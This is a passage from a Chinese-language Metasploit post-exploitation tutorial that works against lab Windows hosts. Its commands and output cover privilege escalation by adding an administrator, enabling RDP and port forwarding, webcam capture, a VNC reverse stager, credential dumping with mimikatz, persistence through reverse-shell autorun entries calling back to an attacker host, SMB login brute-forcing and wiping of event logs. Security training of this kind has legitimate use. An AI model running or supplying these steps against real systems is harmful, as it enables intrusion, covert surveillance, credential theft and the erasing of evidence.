11:11:32 需要密码 Yes 用户可以更改密码 Yes 允许的工作站 All 登录脚本 用户配置文件 主目录 上次登录 2019/10/13 11:12:03 可允许的登录小时数 All 本地组成员 *Users 全局组成员 *None 命令成功完成。 C:\Windows\system32> ``` 可以看到用户属于Users组,非管理员用户,下面添加到管理员组。 ``` C:\Windows\system32>net localgroup administrators test /add net localgroup administrators test /add 命令成功完成。 C:\Windows\system32>net user test net user test 用户名 test 全名 注释 用户的注释 国家/地区代码 000 (系统默认值) 帐户启用 Yes 帐户到期 从不 上次设置密码 2019/10/13 11:11:32 密码到期 2019/11/24 11:11:32 密码可更改 2019/10/13 11:11:32 需要密码 Yes 用户可以更改密码 Yes 允许的工作站 All 登录脚本 用户配置文件 主目录 上次登录 2019/10/13 11:12:03 可允许的登录小时数 All 本地组成员 *Administrators *Users 全局组成员 *None 命令成功完成。 C:\Windows\system32> ``` 可以看到,现在用户test已经同时属于Administrators和Users组了。 ##使用用户远程登录 1. 开启远程桌面rdp ``` meterpreter > run post/windows/manage/enable_rdp [*] Enabling Remote Desktop [*] RDP is disabled; enabling it ... [*] Setting Terminal Services service startup mode [*] The Terminal Services service is not set to auto, changing it to auto ... [*] Opening port in local firewall if necessary [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20191012054909_default_192.168.8.129_host.windows.cle_038774.txt meterpreter > ``` 也可以使用如下命令,达到同样的效果: ``` meterpreter > run getgui -e [!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp. [!] Example: run post/windows/manage/enable_rdp OPTION=value [...] [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Enabling Remote Desktop [*] RDP is already enabled [*] Setting Terminal Services service startup mode [*] Terminal Services service is already set to auto [*] Opening port in local firewall if necessary [*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.5056.rc meterpreter > ``` 2. 登录前检查 远程桌面连接前,先检查下受害用户的空闲时长,因为远程登录会把当前用户踢掉,在登录过程中也会显式提醒: ``` meterpreter > idletime User has been idle for: 3 hours 48 mins 26 secs meterpreter > ``` 3. 使用rdesktop连接目标桌面 ``` root@kali:~# rdesktop 192.168.1.8 Autoselected keyboard map en-us Failed to negotiate protocol, retrying with plain RDP. WARNING: Remote desktop does not support colour depth 24; falling back to 16 ``` 此时弹出GUI界面,输入用户名/密码进行登录 。 ## 账户隐藏 上面新添加的用户可以在目标机器登录界面上看到,因此需要隐藏。 略。 ## 端口转发 下面将远程机器192.168.1.8的3389端口反弹到本地9833端口,然后连接本地9833端口,同样达到远程桌面的效果。 ``` meterpreter > portfwd add -l 9833 -r 192.168.1.8 -p 3389 [*] Local TCP relay created: :9833 <-> 192.168.1.8:3389 meterpreter > ``` 端口转发成功,现在使用rdesktop进行本地连接: ``` root@kali:~# rdesktop 127.0.0.1:9833 Autoselected keyboard map en-us Failed to negotiate protocol, retrying with plain RDP. WARNING: Remote desktop does not support colour depth 24; falling back to 16 root@kali:~# ``` 弹出GUI界面,使用用户名/密码登录成功。 ## 屏幕截图 ``` meterpreter > screenshot Screenshot saved to: /root/aAKvRlgG.jpeg meterpreter > ``` ##操作摄像头 - 获取摄像头列表 ``` webcam-list ``` - 从指定的摄像头拍摄照片 ``` webcam_snap ``` - 从指定的摄像头实时视频流 ``` webcam_stream ``` ## VNC控制 ``` meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > run vnc [*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545 [*] Running payload handler [*] VNC stager executable 73802 bytes long [*] Uploaded the VNC agent to C:\Windows\TEMP\QwdqufeOMpX.exe (must be deleted manually) [*] Executing the VNC agent with endpoint 192.168.1.6:4545... meterpreter > /usr/bin/vncviewer: VNC server closed connection ``` 不知道为什么失败了,经过测试,发现当受害者机器在锁屏界面或者普通用户登录进去的界面时会报这个错。 当管理员用户登录进去时,再运行命令,可以成功,如下: ``` meterpreter > run vnc [*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545 [*] Running payload handler [*] VNC stager executable 73802 bytes long [*] Uploaded the VNC agent to C:\Windows\TEMP\plKeHIXhzUQQ.exe (must be deleted manually) [*] Executing the VNC agent with endpoint 192.168.1.6:4545... Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions meterpreter > No authentication needed Authentication successful Desktop name "pc" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Same machine: preferring raw encoding ``` 成功弹出VNC图形界面,看到受害者桌面。 ##文件操作 可以在meterpreter中使用cd、ls、cat、rm、mkdir等常规命令。 - 上传文件 ``` meterpreter > upload /root/flag.txt [*] uploading : /root/flag.txt -> flag.txt [*] Uploaded 9.00 B of 9.00 B (100.0%): /root/flag.txt -> flag.txt [*] uploaded : /root/flag.txt -> flag.txt meterpreter > ``` 使用pwd可以查看当前目录,即文件被传到哪里了。 - 运行文件 ``` meterpreter > execute -i -f cmd.exe Process 1020 created. Channel 40 created. Microsoft Windows [�汾 6.1.7601] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ���� C:\> ``` 比如上传mimikatz程序,然后执行execute -i -f mimikatz.exe ,进入mimikatz的交互界面。 然后执行下列命令获取密码: privilege::debug sekurlsa::logonpasswords execute命令详解: > -f 指定可执行文件 > > -i 跟进程进行交互 > > -H 创建一个隐藏进程 > > -a 传递给命令的参数 > > -m 从内存中执行 > > -s 在给定会话中执行进程 > > -t 使用当前伪造的线程令牌运行进行 - 下载文件 ``` meterpreter > download "c:\Windows\System32\drivers\etc\hosts" [*] Downloading: c:\Windows\System32\drivers\etc\hosts -> hosts [*] Downloaded 824.00 B of 824.00 B (100.0%): c:\Windows\System32\drivers\etc\hosts -> hosts [*] download : c:\Windows\System32\drivers\etc\hosts -> hosts meterpreter > ``` ##持久化 - 启动项 用msfvenom命令生成一个反弹shell后面,然后放到目标机器下列路径达到开机自启动的效果: ``` C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup ``` 我们只要监听相应的端口就行了。 - 系统服务 ``` meterpreter > run persistence -X -i 5 -p 8888 -r 192.168.1.6 [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] [*] Running Persistence Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/PC_20191013.2138/PC_20191013.2138.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8888 [*] Persistent agent script is 99669 bytes long [+] Persistent Script written to C:\Windows\TEMP\OueYyJlRdu.vbs [*] Executing script C:\Windows\TEMP\OueYyJlRdu.vbs [+] Agent executed with PID 3776 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT meterpreter > ``` persisrence参数说明: > -X 开机启动,-i 反向连接间隔, -r 连接的主机,-p 连接的端口 每隔5秒反弹到192.168.1.6到8888端口,如下: ``` root@kali:~# nc -lvnp 8888 listening on [any] 8888 ... connect to [192.168.1.6] from (UNKNOWN) [192.168.1.8] 49195 ``` 目标机器重启后仍然有效。 实际场景中,还是使用metasploit类的工具等待反弹: ``` msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/multi/handler msf5 exploit(multi/handler) > set lport 8888 lport => 8888 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.1.6:8888 [*] Sending stage (179779 bytes) to 192.168.1.8 [*] Meterpreter session 2 opened (192.168.1.6:8888 -> 192.168.1.8:49267) at 2019-10-13 01:05:56 -0400 meterpreter > getuid Server username: PC\xman666 meterpreter > ``` **持久化需要考虑杀软等,这里会报警**。 ## 横向移动 获取子网信息 ``` meterpreter > run get_local_subnets [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Local subnet: 192.168.1.0/255.255.255.0 meterpreter > ``` 使用metasploit模块查看一下该局域网开启3389的服务器。 ```bash use auxiliary/scanner/rdp/rdp_scanner set rhosts 10.0.15.10-33 run ``` 扫描smb登录 ```bash use auxiliary/scanner/smb/smb_login set RHOSTS 10.0.15.10-33 set SMBUser administrator set SMBPass 123456a? run ``` remotewinenum 有时候,不能直接远程桌面登录另外一台Window机器,这个时候可以使用Enter-PSSession命令,通过PowerShell终端登到远程的Window机器,这个时候,就需要被访问的机器打开5985 或者5986 端口。 默认情况下,Window 2008 Server或者Window 2012 Server会自动默认开启WinRM的服务器,从而暴露5985或者5986端口。 ``` Enter-PSSession -computerName Server-R2 ``` ## 清除痕迹 ``` meterpreter > clearev [*] Wiping 8202 records from Application... [*] Wiping 23907 records from System... [*] Wiping 8154 records from Security... meterpreter > ```